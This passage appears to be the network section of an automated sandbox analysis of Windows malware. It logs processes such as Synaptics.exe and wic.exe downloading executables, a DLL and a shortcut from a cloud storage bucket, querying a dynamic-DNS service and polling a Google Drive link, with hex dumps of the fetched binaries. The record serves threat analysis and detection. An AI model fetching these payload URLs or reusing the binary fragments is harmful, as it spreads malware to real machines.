                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 12059760812609244457
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: Oee+c8dTGsiV91g0/cG81g==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 16 c9 9a 88 77 a7 c9 88 77 a7 c9 88 77 a7 c9 3c eb 56 c9 85 77 a7 c9 3c eb 54 c9 06 77 a7 c9 3c eb 55 c9 90 77 a7 c9 08 0c 5a c9 8a 77 a7 c9 08 0c a3 c8 9b 77 a7 c9 08 0c a4 c8 9f 77 a7 c9 08 0c a2 c8 bd 77 a7 c9 81 0f 24 c9 83 77 a7 c9 81 0f 34 c9 8f 77 a7 c9 88 77 a6 c9 92 76 a7 c9 06 0c a2 c8 b9 77 a7 c9 06 0c a7 c8 89 77 a7 c9 06 0c 58 c9 89 77 a7 c9 06 0c a5 c8 89 77 a7 c9 52 69 63 68 88 77 a7 c9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b2 cf c8 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 2e 03 00 00 f6 03 00 00 00 00 00 90 07 02 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$www<Vw<Tw<UwZwwww$w4wwvwwXwwRichwPELd!.@@p@4P`t@#Tf@@x\ .text-. `.rdata@2@@.dataPG@.didatP
                                                                            Jan 2, 2025 20:34:56.036659956 CET306OUTGET /270/wic.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Connection: Keep-Alive
                                                                            Jan 2, 2025 20:34:56.525973082 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:34:56 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 3483648
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA6054F7EDD933C5AA70
                                                                            Accept-Ranges: bytes
                                                                            ETag: "6AD65B03E75BC5509BA3104510178EE6"
                                                                            Last-Modified: Sat, 02 Nov 2024 15:06:38 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 12551179916436374333
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: atZbA+dbxVCboxBFEBeO5g==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 ad 33 d9 23 cc 5d 8a 23 cc 5d 8a 23 cc 5d 8a 46 aa 5e 8b 3d cc 5d 8a 46 aa 59 8b 05 cc 5d 8a 46 aa 58 8b c4 cc 5d 8a 46 aa 5b 8b 20 cc 5d 8a 71 a4 59 8b 01 cc 5d 8a 71 a4 5e 8b 3a cc 5d 8a 71 a4 58 8b 5f cd 5d 8a 46 aa 5c 8b 06 cc 5d 8a 23 cc 5c 8a 35 cf 5d 8a 88 a5 54 8b 20 cc 5d 8a 88 a5 a2 8a 22 cc 5d 8a 23 cc ca 8a 22 cc 5d 8a 88 a5 5f 8b 22 cc 5d 8a 52 69 63 68 23 cc 5d 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fb 3e 26 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 1a 18 00 00 52 1d 00 00 00 00 00 09 ba 14 00 00 10 00 00 00 30 18 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g3#]#]#]F^=]FY]FX]F[ ]qY]q^:]qX_]F\]#\5]T ]"]#"]_"]Rich#]PEL>&gR0@5@[|Pp32p@0.text `.rdatab0d@@.data^@.rsrcP


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44973869.42.215.252805236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 2, 2025 20:34:59.034657955 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                            User-Agent: MyApp
                                                                            Host: freedns.afraid.org
                                                                            Cache-Control: no-cache
                                                                            Jan 2, 2025 20:34:59.702755928 CET243INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Thu, 02 Jan 2025 19:34:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding
                                                                            X-Cache: MISS
                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44974047.254.187.72807568C:\Windows\wic.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 2, 2025 20:34:59.435656071 CET151OUTGET /270/cbas.exe HTTP/1.1
                                                                            User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Jan 2, 2025 20:35:00.259752035 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:35:00 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 295424
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA64494A37041BC6A984
                                                                            Accept-Ranges: bytes
                                                                            ETag: "9FD7C0ACC95C7F1311BDE279D0B6A03A"
                                                                            Last-Modified: Sat, 02 Nov 2024 13:26:13 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 13157587370901313456
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: n9fArMlcfxMRveJ50LagOg==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d b7 62 8a 09 d6 0c d9 09 d6 0c d9 09 d6 0c d9 7a b4 0f d8 04 d6 0c d9 7a b4 09 d8 a0 d6 0c d9 7a b4 08 d8 1f d6 0c d9 5b be 0f d8 1e d6 0c d9 7a b4 0d d8 00 d6 0c d9 09 d6 0d d9 82 d6 0c d9 5b be 09 d8 49 d6 0c d9 5b be 08 d8 28 d6 0c d9 a2 bf 05 d8 08 d6 0c d9 a2 bf f3 d9 08 d6 0c d9 a2 bf 0e d8 08 d6 0c d9 52 69 63 68 09 d6 0c d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 73 22 26 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 18 03 00 00 76 01 00 00 00 00 00 2c 3a 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mbzzz[z[I[(RichPELs"&gv,:0@@xG<L*p0@0.text `.rdata*"0$@@.data@ `@@.rsrcR@@.reloc
                                                                            Jan 2, 2025 20:35:00.259772062 CET224INData Raw: 00 00 4c 2a 00 00 00 a0 04 00 00 2c 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: L*,V@B
                                                                            Jan 2, 2025 20:35:00.259784937 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: jhTDiDh#C'YjhXDiD_hp#Ca'Yjh`DiD?h#CA'YjhdDjD
                                                                            Jan 2, 2025 20:35:00.259799957 CET224INData Raw: 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc 8b 49 04 b8 a0 0d 44 00 85 c9 0f 45 c1 c3 cc cc 55 8b ec 56 8b f1 8d 46 04 c7 06 84 32 43 00 50 e8 f6 32 01 00 83 c4 04 f6 45 08 01 74 0b 6a 0c 56 e8 1b 23 01 00 83 c4 08 8b c6 5e 5d c2 04 00 55 8b ec 83
                                                                            Data Ascii: ^]IDEUVF2CP2EtjV#^]Ul`D3EUEVUNEQW2CPfA2M2C3^t]A2CPl2YWfAAD
                                                                            Jan 2, 2025 20:35:00.261188030 CET1236INData Raw: 01 b4 47 43 00 c3 cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 fa 12 43 00 64 a1 00 00 00 00 50 83 ec 10 56 a1 6c 60 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 6a 00 e8 c3 04 01 00 c7 45 fc 00 00 00 00 c7 46 04 00 00 00 00 c6 46 08 00
                                                                            Data Ascii: GCUjhCdPVl`D3PEdujEFFFF3FfFFfF F$F(F,F0EEtPVMdY^]hDMhhFDEP9Ujh CdPVl`D3PEd
                                                                            Jan 2, 2025 20:35:00.261217117 CET1236INData Raw: 0c 75 07 b0 01 5e 5d c2 08 00 32 c0 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc 56 68 70 7f 44 00 68 00 b2 40 00 68 30 7f 44 00 8b f1 e8 75 00 01 00 83 c4 0c 85 c0 74 11 c7 06 01 00 00 00 8b c6 c7 46 04 70 7f 44 00 5e c3 e8 aa 9c 01 00 cc cc cc cc
                                                                            Data Ascii: u^]2^]VhpDh@h0DutFpD^SUkl$jhpCdPSXl`D3EVWPEd}CMP}._CsEuEMtHU+jhDr$uACuEV95F
                                                                            Jan 2, 2025 20:35:00.261229992 CET448INData Raw: 83 c4 08 8b 46 0c 89 47 0c 8b 46 10 89 47 10 8b c7 c7 07 a4 18 44 00 5f 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 0f 57 c0 57 8b f9 8d 47 04 50 c7 07 84 32 43 00 66 0f d6 00 8d 46 04 50 e8 f4 27 01 00 c7 07 9c 32 43 00 83 c4
                                                                            Data Ascii: FGFGD_^]UVuWWGP2CfFP'2CFGFG2C_^]UVuWWGP2CfFP'2CFGFG_^]UjhCdPVl`D3PEdEV
                                                                            Jan 2, 2025 20:35:00.261241913 CET1176INData Raw: 30 43 00 8b f0 85 f6 74 36 57 53 ff 15 fc 30 43 00 8b 4d 08 8d 14 06 83 e1 0f 76 12 3b f2 73 1f 0f b7 06 8d 34 46 83 c6 02 83 e9 01 75 ee 3b f2 73 0d 66 83 3e 00 74 07 5f 8b c6 5e 5b 5d c3 5f 5e 33 c0 5b 5d c3 55 8b ec ff 75 08 6a 00 ff 71 04 ff
                                                                            Data Ascii: 0Ct6WS0CMv;s4Fu;sf>t_^[]_^3[]Uujqd0C]UEtPjq0C]UUuu]EuRP3]PRjqH0C]Uujq0C]UV~h
                                                                            Jan 2, 2025 20:35:00.264590979 CET1236INData Raw: 8d e4 fe ff ff e8 94 75 00 00 8b b5 e4 fe ff ff 85 db 74 18 83 7e f4 00 7c 12 53 56 e8 42 9f 01 00 83 c4 08 85 c0 74 04 2b c6 79 1b 8d 85 b0 fd ff ff 50 ff b5 ac fd ff ff ff 15 44 30 43 00 85 c0 0f 85 27 ff ff ff ff b5 ac fd ff ff ff 15 4c 30 43
                                                                            Data Ascii: ut~|SVBt+yPD0C'L0CEFHVRMdY_^[M3]h@`UEVhDtjV^]VW;t!fDt
                                                                            Jan 2, 2025 20:35:00.264604092 CET1236INData Raw: 8c 52 50 51 8d 8d b8 fe ff ff e8 fb 4a 00 00 6a 48 8d 85 70 fe ff ff 6a 00 50 e8 8b 2b 01 00 83 c4 0c 8d 8d 70 fe ff ff e8 bd 4b 00 00 6a 48 8d 45 a0 c6 45 fc 05 6a 00 50 e8 6c 2b 01 00 8b 85 b8 fe ff ff 8d 4d b8 89 45 a0 83 c4 0c 8b 85 bc fe ff
                                                                            Data Ascii: RPQJjHpjP+pKjHEEjPl+MEEEEEEPE~fE~EfE~EfEEpEPM/Ij8T
                                                                            Jan 2, 2025 20:35:00.264775038 CET1236INData Raw: 0f 00 00 00 c6 47 0c 00 c7 45 fc 00 00 00 00 c7 47 34 00 00 00 00 c7 47 38 0f 00 00 00 c6 47 24 00 c7 47 4c 00 00 00 00 c7 47 50 0f 00 00 00 c6 47 3c 00 c6 45 fc 02 8d 77 60 c7 47 5c 00 00 00 00 89 75 ec c7 06 00 00 00 00 c7 46 04 00 00 00 00 e8
                                                                            Data Ascii: GEG4G8G$GLGPG<Ew`G\uFpmGxG|Gh
                                                                            Jan 2, 2025 20:35:01.021306992 CET153OUTGET /270/msslac.dll HTTP/1.1
                                                                            User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Jan 2, 2025 20:35:01.530543089 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:35:01 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 208896
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA6554F7EDD933C5ACFB
                                                                            Accept-Ranges: bytes
                                                                            ETag: "5E3BC49297F0765C486693790157273F"
                                                                            Last-Modified: Sat, 02 Nov 2024 13:26:13 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 2028005770612052367
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: XjvEkpfwdlxIZpN5AVcnPw==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 73 dc f1 b2 12 b2 a2 b2 12 b2 a2 b2 12 b2 a2 71 1d ed a2 b5 12 b2 a2 71 1d ef a2 a7 12 b2 a2 b2 12 b3 a2 67 13 b2 a2 95 d4 cf a2 ab 12 b2 a2 95 d4 df a2 23 12 b2 a2 95 d4 dc a2 c5 12 b2 a2 95 d4 c0 a2 b0 12 b2 a2 95 d4 c8 a2 b3 12 b2 a2 95 d4 ce a2 b3 12 b2 a2 95 d4 ca a2 b3 12 b2 a2 52 69 63 68 b2 12 b2 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 06 26 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 00 02 00 00 20 01 00 00 00 00 00 42 dc 00 00 00 10 00 00 00 10 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 03 00 00 10 00 00 29 54 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sqqg#RichPEL&g! Bp)T{Cpg: xpC@f@.text^ `.rdatakp@@.data|Z @.rsrc:@@@.relocI
                                                                            Jan 2, 2025 20:35:01.711280107 CET151OUTGET /270/cbas.lnk HTTP/1.1
                                                                            User-Agent: Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+LinLauncher)
                                                                            Host: bruplong.oss-accelerate.aliyuncs.com
                                                                            Jan 2, 2025 20:35:02.093417883 CET1236INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Thu, 02 Jan 2025 19:35:02 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 795
                                                                            Connection: keep-alive
                                                                            x-oss-request-id: 6776EA654346DC2430C58EF6
                                                                            Accept-Ranges: bytes
                                                                            ETag: "64C03FC25A3910E81DD3546B9F3AD9DC"
                                                                            Last-Modified: Sat, 02 Nov 2024 14:20:11 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 1167351137622024420
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000109
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: ZMA/wlo5EOgd01RrnzrZ3A==
                                                                            x-oss-server-time: 2
                                                                            Data Raw: 4c 00 00 00 01 14 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 9b 00 08 00 20 00 00 00 f4 84 22 c2 31 2d db 01 b4 7d cb c5 31 2d db 01 80 1b c7 34 27 2d db 01 00 82 04 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 df 00 14 00 1f 50 e0 4f d0 20 ea 3a 69 10 a2 d8 08 00 2b 30 30 9d 19 00 2f 43 3a 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 00 31 00 00 00 00 00 5e 59 65 79 10 00 57 69 6e 64 6f 77 73 00 40 00 09 00 04 00 ef be 87 4f 77 48 62 59 69 6b 2e 00 00 00 38 b0 02 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2d b1 ac 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 00 00 16 00 5a 00 32 00 00 82 04 00 62 59 12 68 20 00 63 62 61 73 2e 65 78 65 00 00 42 00 09 00 04 00 ef be 62 59 04 72 62 59 04 72 2e 00 00 00 dd 52 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 96 98 00 63 00 62 00 61 00 73 00 2e 00 65 00 78 00 65 00 00 00 18 00 00 00 42 00 00 00 1c 00 00 00 01 00 00 00 1c 00 00 00 2d 00 00 00 00 00 00 00 41 00 00 00 11 00 00 00 03 00 00 00 1d [TRUNCATED]
                                                                            Data Ascii: LF "1-}1-4'-PO :i+00/C:\V1^YeyWindows@OwHbYik.8-WindowsZ2bYh cbas.exeBbYrbYr.Rcbas.exeB-Ae=(C:\Windows\cbas.exe..\..\..\Windows\cbas.exeC:\Windows$CBg(#`Xdesktop-41g4k28PAr)JPAr)J1SPSXFL8C&mq/S-1-5-21-2574277016-156308586


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449845142.250.186.1424435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:35:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Host: docs.google.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-02 19:35:58 UTC1314INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:35:58 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-jttXjix5NtM2z55eSnYnkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449852142.250.185.2254435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:35:59 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2025-01-02 19:36:00 UTC1594INHTTP/1.1 404 Not Found
                                                                            X-GUploader-UploadID: AFiumC47w-qW8SWFOir8jseBMN5Zm2fnWJKBX3fIboutLCpIm889aHoM16E_vnpa78FMkXIX
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:35:59 GMT
                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-SqMzk4jmfdgy01mO5kIAwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Length: 1652
                                                                            Server: UploadServer
                                                                            Set-Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0; expires=Fri, 04-Jul-2025 19:35:59 GMT; path=/; domain=.google.com; HttpOnly
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2025-01-02 19:36:00 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 59 44 56 2d 75 74 53 47 61 4e 56 35 6c 39 6d 30 41 6a 46 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0YDV-utSGaNV5l9m0AjFTw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                            2025-01-02 19:36:00 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449861142.250.186.1424435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:36:00 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Host: docs.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                                                                            2025-01-02 19:36:01 UTC1314INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:36:00 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
